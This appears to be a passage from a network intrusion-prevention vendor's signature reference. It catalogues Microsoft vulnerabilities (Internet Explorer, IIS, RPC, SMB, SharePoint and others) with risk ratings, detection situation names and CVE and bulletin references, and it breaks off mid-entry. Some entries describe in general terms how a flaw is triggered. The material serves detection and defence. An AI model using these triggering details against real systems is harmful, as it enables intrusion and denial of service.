A denial of service vulnerability has been reported in the snabase.exe component of Microsoft's Host Integration Server, which is an add-on component of Microsoft's BizTalk Enterprise Service Business suite. Specifically, this vulnerability is due to incorrect memory access when processing certain malicious packets.

Situation:

Generic_UDP-MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error

References:

CVE-2011-2008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2008

OSVDB-76224
http://www.osvdb.org/76224

MS11-028
http://technet.microsoft.com/security/bulletin/MS11-028

MS-Ie-Async-Null-Object-Access-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Internet Explorer

Situation:

File-Text_MS-Ie-Async-Null-Object-Access-Remote-Code-Execution

References:

CVE-2012-1521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1521

MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052

MS-Ie-Frame-Iframe-Embed-Tag-Attribute-BOF-MS04-040

About this vulnerability:

Buffer overflow in MS IE FRAME/IFRAME/EMBED tag handling (MS04-040)

Risk:

High

First detected in:

sgpkg-ips-267-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Buffer Overflow

Description:

Microsoft Internet Explorer contains a buffer overflow in NAME and SRC attribute handling of FRAME, IFRAME and EMBED tags. A remote attacker could create a specially crafted web page and execute arbitrary code on the vulnerable system once the malicious page is visited. The Bofra worm and MyDoom.AG/AH variants are also known to exploit this vulnerability.

Situation:

Generic_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow
HTTP_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow
File-Text_Internet-Explorer-HTML-Elements-Buffer-Overflow

References:

CVE-2004-1050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1050

BID-11515
http://www.securityfocus.com/bid/11515

OSVDB-11337
http://www.osvdb.org/11337

MS04-040
http://technet.microsoft.com/security/bulletin/MS04-040

MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289

About this vulnerability:

Malicious script

Risk:

Moderate

First detected in:

sgpkg-ips-519-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Malicious script

Situation:

File-Text_MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289

References:

CVE-2013-1289
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1289

MS13-035
http://technet.microsoft.com/security/bulletin/MS13-035

MS-Ie-JavaScript-Code-Execution-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1586-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Internet Explorer

References:

CVE-2012-2522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2522

MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052

MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526

About this vulnerability:

Malicious style attribute

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0

Type:

Malfunction

Description:

A malicious style attribute used on a web page

Situation:

File-Text_MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526

References:

CVE-2012-1526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1526

MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052

MS-Ie-Style-Tag-Comment-DoS

About this vulnerability:

Denial of Service (DoS) vulnerability in MS IE

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Microsoft Internet Explorer is vulnerable to a Denial of Service (DoS) attack. By creating a specially-crafted Web page containing a STYLE tag followed by a comment that is not terminated, a remote attacker can cause Internet Explorer to crash, once the Web page is visited.

Situation:

File-Text_MS-Ie-Style-Tag-Comment-DoS

References:

CVE-2004-0842
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0842

BID-10816
http://www.securityfocus.com/bid/10816

OSVDB-10710
http://www.osvdb.org/10710

MS04-038
http://technet.microsoft.com/security/bulletin/MS04-038

MS-IIS-HTTP-TRACK-Logging-Failure

About this vulnerability:

MS IIS fails to log HTTP TRACK requests

Risk:

Low

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Malfunction

Description:

Microsoft Internet Information Server (IIS) fails to properly log HTTP TRACK requests. By sending a specialy-crafted HTTP TRACK request, a remote attacker could cause the server to disclose sensitive information without the request being logged.

Situation:

HTTP_CS-MS-IIS-HTTP-TRACK-Logging-Failure

References:

BID-9313
http://www.securityfocus.com/bid/9313

OSVDB-4864
http://www.osvdb.org/4864

MS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030

About this vulnerability:

Microsoft IIS Server WebDAV XML Requests Denial of Service Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 5.0; IIS 5.1; IIS 6.0

Type:

Malfunction

Description:

The WebDAV Message Handler for Internet Information Services 5.0, 5.1, and 6.0 allows remote attackers to cause a denial of service (memory and CPU exhaustion, application crash) via an XML message containing XML elements with a large number of attributes.

Situation:

HTTP_CS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030

References:

CVE-2003-0718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0718

BID-11384
http://www.securityfocus.com/bid/11384

OSVDB-10688
http://www.osvdb.org/10688

MS04-030
http://technet.microsoft.com/security/bulletin/MS04-030

MS-Internet-Explorer-CVE_2012-1889

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Internet Explorer

Situation:

File-Text_MS-Internet-Explorer-CVE_2012-1889

References:

CVE-2012-1889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889

MS12-052
http://technet.microsoft.com/security/bulletin/MS12-052

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3115

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3115

References:

CVE-2013-3115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3115

MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3143

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3144
File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3143

References:

CVE-2013-3143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3143

BID-60962
http://www.securityfocus.com/bid/60962

OSVDB-94967
http://www.osvdb.org/94967

MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3145

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3145

References:

CVE-2013-3145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3145

MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3146

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3146

References:

CVE-2013-3146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3146

MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3147

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3147

References:

CVE-2013-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3147

BID-60966
http://www.securityfocus.com/bid/60966

OSVDB-94971
http://www.osvdb.org/94971

MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3148

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-531-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Internet Explorer

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3148

References:

CVE-2013-3148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3148

MS13-055
http://technet.microsoft.com/security/bulletin/MS13-055

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270

References:

CVE-2014-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0270

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276

References:

CVE-2014-0276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0276

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278

References:

CVE-2014-0278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0278

MS14-010
http://technet.microsoft.com/security/bulletin/MS14-010

MS-Internet-Explorer-Select-Element-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

HTTP_SS-MS-Internet-Explorer-Select-Element-Remote-Code-Execution
File-Text_MS-Internet-Explorer-Select-Element-Remote-Code-Execution

References:

CVE-2011-1999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1999

BID-49964
http://www.securityfocus.com/bid/49964

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

MS-NetDDE-Remote-Buffer-Overflow-MS04-031

About this vulnerability:

Microsoft Windows NetDDE Remote Buffer Overflow Vulnerability (MS04-031)

Risk:

Moderate

First detected in:

sgpkg-ips-18-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows NetDDE service

Type:

Buffer Overflow

Description:

Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. The NetDDE services are not started by default and would have to be manually started, or started by an application that requires NetDDE, for an attacker to attempt to remotely exploit this vulnerability.

Situation:

NetBIOS-TCP_MS-NetDDE-Remote-Buffer-Overflow-MS04-031-2
NetBIOS-TCP_MS-NetDDE-Remote-Buffer-Overflow-MS04-031
MSRPC-TCP_CPS-NetDDE-Remote-Buffer-Overflow-MS04-031

References:

CVE-2004-0206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0206

BID-11372
http://www.securityfocus.com/bid/11372

OSVDB-10689
http://www.osvdb.org/10689

MS04-031
http://technet.microsoft.com/security/bulletin/MS04-031

MS-NNTP-BOF-MS04-036

About this vulnerability:

Microsoft NNTP Component Heap Overflow Vulnerability

Risk:

High

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003

Software:

Exchange Server; Exchange Server 2000; Exchange Server 2003

Type:

Buffer Overflow

Description:

The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows.

Situation:

NNTP_MS-Windows-NNTP-Server-Buffer-Overflow

References:

CVE-2004-0574
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0574

BID-11379
http://www.securityfocus.com/bid/11379

OSVDB-10697
http://www.osvdb.org/10697

MS04-036
http://technet.microsoft.com/security/bulletin/MS04-036

MS-Office-Xp-Url-BOF-MS05-005

About this vulnerability:

Buffer overflow in MS Office XP (MS05-005)

Risk:

Low

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

Microsoft Office XP

Type:

Buffer Overflow

Description:

Microsoft Office XP has a buffer overflow vulnerability in the process that passes URL file locations to the software. A remote attacker could send a specially crafted URL request with long inputs after (1) %00 (null byte) in .doc filenames or (2) %0a (new line) in .rtf filenames to overflow a buffer and execute arbitrary code on the system with the victim's privileges.

References:

CVE-2004-0848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0848

BID-12480
http://www.securityfocus.com/bid/12480

OSVDB-13594
http://www.osvdb.org/13594

MS05-005
http://technet.microsoft.com/security/bulletin/MS05-005

MS-RPC-DCOM-Interface-DoS-MS03-039

About this vulnerability:

Denial of Service (DoS) vulnerability in MS Windows RPC DCOM interface (MS03-039)

Risk:

Moderate

First detected in:

sgpkg-ips-24-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP3; Windows 2000 SP4

Software:

Windows DCOM RPC Service

Type:

Malfunction

Description:

A denial of service vulnerability exists in Microsoft Windows RPCSS service. The vulnerability is due to lack of data validation when RPCSS service handles DCOM activation requests. A remote un-authenticated attacker can exploit this flaw by sending specially crafted RPC requests to the RPCSS service on the target system. Successful exploitation could raise a denial of service condition of the RPCSS service on the target system. An attack targeting this vulnerability can result in termination of the affected service, RPCSS. As a result of this, certain basic functions, such as copy-paste, RPC emapper, and DCOM services will not be available. The system will still be operating, with some of its functions disabled.

Situation:

MSRPC-TCP_MS-RPC-DCOM-Interface-DoS-MS03-039-2
MSRPC-TCP_CPS-MS-RPC-DCOM-Interface-DoS-MS03-039-2
MSRPC-TCP_CPS-MS-RPC-DCOM-Interface-DoS-MS03-039

References:

CVE-2003-0605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0605

BID-8234
http://www.securityfocus.com/bid/8234

OSVDB-11460
http://www.osvdb.org/11460

MS03-039
http://technet.microsoft.com/security/bulletin/MS03-039

MS-RPC-Endpoint-Mapper-DoS-MS03-010

About this vulnerability:

Denial of Service (DoS) vulnerability in MS Windows RPC Endpoint Mapper (MS030-010)

Risk:

Moderate

First detected in:

sgpkg-ips-24-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows NT 4.0; Windows XP

Software:

RPC

Type:

Malfunction

Description:

Microsoft Windows 2000, Windows NT, and Windows XP systems are vulnerable to a Denial of Service (DoS) attack in the RPC (Remote Procedure Call) service, if TCP port 135 is opened. A remote attacker could send a malformed packet to TCP port 135 to cause the RPC service to become disabled.

Situation:

MSRPC-TCP_CPS-MS-RPC-Endpoint-Mapper-DoS-MS03-010

References:

CVE-2002-1561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1561

BID-6005
http://www.securityfocus.com/bid/6005

MS03-010
http://technet.microsoft.com/security/bulletin/MS03-010

MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010

About this vulnerability:

XSS in SCOM

Risk:

Moderate

First detected in:

sgpkg-ips-502-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft System Center Operations Manager

Type:

Cross-site Scripting

Description:

A very large XML file was detected

Situation:

HTTP_CRL-MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010

References:

CVE-2013-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0010

MS13-003
http://technet.microsoft.com/security/bulletin/MS13-003

MS-Search-URI-Scheme

About this vulnerability:	search-ms or search URI scheme
Risk:	Moderate
First detected in:	sgpkg-ips-1738-5242
Last changed:	sgpkg-ips-1774-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	Windows Search and search-ms protocols allow calling Windows Search Explorer or any other desktop search applications. Both protocols also support searches on remote file shares. This functionality can be used for enticing a user into downloading and executing malicious files.
Situation:	File-Text_Suspicious-MS-Search-URI-Scheme-Link-In-HTML File-Text_MS-Search-URI-Scheme-Link-In-HTML

MS-Sharepoint-Workflowcodetypereferenceexpression-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Sharepoint Enterprise Server

Risk:

Moderate

First detected in:

sgpkg-ips-1547-5242

Last changed:

sgpkg-ips-1547-5242

Platform:

Windows

Software:

Microsoft Sharepoint

Type:

Input Validation

Description:

Improper input validation of the workflow rules file used to generate custom workflows causes a deserialization vulnerability in Microsoft Sharepoint. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Microsoft-Sharepoint-Workflow-Workflowcodetypereferenceexpression-Insecure-Deserialization

References:

CVE-2022-35823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35823

MS-SMTP-Service-Ntlm-Null-Session-Authentication-Bypass-MS02-011

About this vulnerability:

MS Windows SMTP service flaw may allow bypassing mail relay restrictions (MS02-011)

Risk:

Moderate

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2

Software:

Exchange Server 5.0; Exchange Server 5.5

Type:

Malfunction

Description:

SMTP service in Microsoft Windows 2000 and in Exchange Server 5.0/5.5 does not handle properly responses to NTLM authentication. This allows remote attackers to perform mail relaying via an SMTP AUTH command by using null session credentials.

Situation:

SMTP_Ntml-Null-Session-Authentication-Bypass

References:

CVE-2002-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0054

BID-4205
http://www.securityfocus.com/bid/4205

OSVDB-5253
http://www.osvdb.org/5253

MS02-011
http://technet.microsoft.com/security/bulletin/MS02-011

MS-SQL-Rdbms-Engine-Elevation-Of-Privilege-Vulnerability-CVE-2016-7250

About this vulnerability:

A vulnerability in MS SQL

Risk:

Moderate

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server

Type:

Input Validation

Description:

A vulnerability in Microsoft SQL Server

Situation:

MSSQL_Rdbms-Engine-Elevation-Of-Privilege-Vulnerability-CVE-2016-7250

References:

CVE-2016-7250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7250

MS16-136
http://technet.microsoft.com/security/bulletin/MS16-136

MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888

About this vulnerability:

Malicios DXF file

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visio

Type:

Buffer Overflow

Description:

Improper parsing of a DXF file may result in a system compromise

Situation:

File-TextId_MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888

References:

CVE-2012-1888
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1888

MS12-059
http://technet.microsoft.com/security/bulletin/MS12-059

MS-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-1765-5242

Last changed:

sgpkg-ips-1765-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper handling of DHCP failover packets in the MFParseDhcpFailoverMessage function causes an out of bounds read vulnerability in the Microsoft Windows DHCP server. A successful exploitation causes a denial of service condition.

Situation:

Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read

References:

CVE-2024-30070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30070

MS-Windows-Msxml-Information-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability exists in the MSXML service.

Situation:

File-Text_MS-Windows-Msxml-Information-Disclosure-Vulnerability
File-TextId_MS-Windows-Msxml-Information-Disclosure-Vulnerability

References:

CVE-2014-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0266

MS14-005
http://technet.microsoft.com/security/bulletin/MS14-005

MS-Windows-Print-Spooler-Service-Format-String-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Windows.

Situation:

SMB-TCP_MS-Windows-Print-Spooler-Service-Format-String-Vulnerability
NetBIOS-UDP_CS-MS-Windows-Print-Spooler-Service-Format-String-Vulnerability

References:

CVE-2012-1851
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1851

BID-54928
http://www.securityfocus.com/bid/54928

OSVDB-84599
http://www.osvdb.org/84599

MS12-054
http://technet.microsoft.com/security/bulletin/MS12-054

MS-Windows-SMB-Transaction-BOF-MS05-011

About this vulnerability:

Buffer overflow in MS Windows SMB transaction handler

Risk:

Moderate

First detected in:

sgpkg-ips-349-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2; Windows 2000 SP3; Windows 2000 SP4; Windows 2003 SP0; Windows XP SP0; Windows XP SP1; Windows XP SP2

Software:

<os>

Type:

Buffer Overflow

Description:

Microsoft Windows Service Message Block (SMB) transaction handler contains a buffer overflow vulnerability. An authenticated remote attacker could create a malformed SMB Transaction response packet to execute arbitrary code on the client system.

Situation:

SMB-TCP_Microsoft-Windows-SMB-Response-Handling-Buffer-Overflow
SMB-TCP_SHS-Microsoft-Windows-SMB-Client-Transaction-BOF-MS05-011

References:

CVE-2005-0045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0045

BID-12484
http://www.securityfocus.com/bid/12484

OSVDB-13600
http://www.osvdb.org/13600

MS05-011
http://technet.microsoft.com/security/bulletin/MS05-011

MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Windows

Situation:

File-Binary_MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159

References:

CVE-2012-0159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0159

BID-53335
http://www.securityfocus.com/bid/53335

MS12-034
http://technet.microsoft.com/security/bulletin/MS12-034

MS-Windows-Weak-Administrator-Password

About this vulnerability:	MS Windows uses weak or null Administrator password
Risk:	Low
First detected in:	sgpkg-ips-22-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Insecure Configuration
Description:	Microsoft Windows has a default Administrator account, which may have a weak or blank password. A remote attacker could exploit this to gain unauthorized access to the vulnerable system.
Situation:	SMB-TCP_CHS-Windows-Admin-Share-Default-Password-Access

MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-550-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

A vulnerability in Microsoft Word

Situation:

File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1325
File-Binary_MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324

References:

CVE-2013-1324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1324

MS13-091
http://technet.microsoft.com/security/bulletin/MS13-091

MS-XML-Remote-Code-Execution-CVE-2018-8420

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_MS-XML-Remote-Code-Execution-CVE-2018-8420

References:

CVE-2018-8420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8420

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

MS03-043

About this vulnerability:

Buffer Overflow in Windows Messenger

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Messenger

Type:

Buffer Overflow

Description:

Microsoft Windows Messenger Service buffer overflow can be created by crafting a packet containing lots of 0x14 which are replaced by CR+LF. The replacements grow the packet and the new size is not verified allowing a buffer overflow to take place when the packet is copied into a secondary buffer. This allows the attacker to run arbitary code.

Situation:

Generic_MSRPC-Messenger-BOF-MS03-043-Breaking-Point
Generic_MSRPC-Messenger-BOF-MS03-043
MSRPC-UDP_CPS-Messenger-BOF-MS03-043

References:

CVE-2003-0717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0717

BID-8826
http://www.securityfocus.com/bid/8826

MS03-043
http://technet.microsoft.com/security/bulletin/MS03-043

MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567

About this vulnerability:

A vulnerability in MSHTML Engine

Risk:

High

First detected in:

sgpkg-ips-1269-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Use-after-free

Description:

There exists a memory corruption vulnerability in MSHTML Engine. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567

References:

CVE-2020-1567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1567

ms20-aug
http://technet.microsoft.com/security/bulletin/ms20-aug

MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-550-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

HTTP_CSU-Script-Tag-In-URI
HTTP_CSU-MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908

References:

CVE-2013-3908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3908

OSVDB-99644
http://www.osvdb.org/99644

MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088

MSIE-JSON-Array-Information-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

